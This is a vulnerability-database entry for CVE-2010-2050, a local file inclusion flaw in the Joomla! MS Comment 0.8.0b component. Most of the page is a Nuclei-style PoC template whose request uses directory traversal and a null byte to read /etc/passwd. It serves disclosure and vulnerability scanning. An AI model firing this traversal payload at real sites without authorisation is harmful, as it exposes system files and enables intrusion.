CVE-2010-2050: Joomla! Component MS Comment 0.8.0b - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! | POC: 已公开

漏洞描述

A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

PoC代码[已公开]

id: CVE-2010-2050

info:
  name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12611
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2050
    - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt
    - http://www.vupen.com/english/advisories/2010/1159
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2050
    cwe-id: CWE-22
    epss-score: 0.02252
    epss-percentile: 0.84055
    cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: m0r0n
    product: com_mscomment
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210089d9541c0dd0cd9c41d5088aa54e31484e9015174a0a31334f67aa85fe19a6f6022100a132fd389d5761ee70ab30c1f2214f8404aa98f1ad45843d4307e78ad59f939b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐